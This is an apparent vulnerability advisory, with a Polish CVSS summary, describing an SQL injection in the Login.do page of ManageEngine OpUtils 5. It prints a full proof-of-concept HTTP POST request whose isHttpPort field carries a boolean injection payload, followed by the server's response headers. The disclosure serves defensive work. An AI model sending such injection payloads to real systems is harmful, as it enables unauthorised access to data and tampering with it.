ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability

2010.03.23
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

================================================================================ ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability ================================================================================ #Date-3/2/10 # code by Asheesh kumar Mani Tripathi # AKS IT Services # Credit by Asheesh Anaconda #Download http://www.manageengine.com/products/oputils #Vulnerbility ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. #Impact A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database ======================================================================================================================== Request ======================================================================================================================== POST /Login.do HTTP/1.1 Host: localhost:7080 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://localhost:7080/Login.do Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp Content-Type: application/x-www-form-urlencoded Content-Length: 136 cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0 ======================================================================================================================== Response ======================================================================================================================== HTTP/1.1 200 OK Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 03 Feb 2010 15:24:08 GMT Server: Apache-Coyote/1.1 Content-Length: 20583

Referencje:

http://xforce.iss.net/xforce/xfdb/56102
http://www.securityfocus.com/bid/38082
http://www.exploit-db.com/exploits/11330
http://packetstormsecurity.org/1002-exploits/oputils_5-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top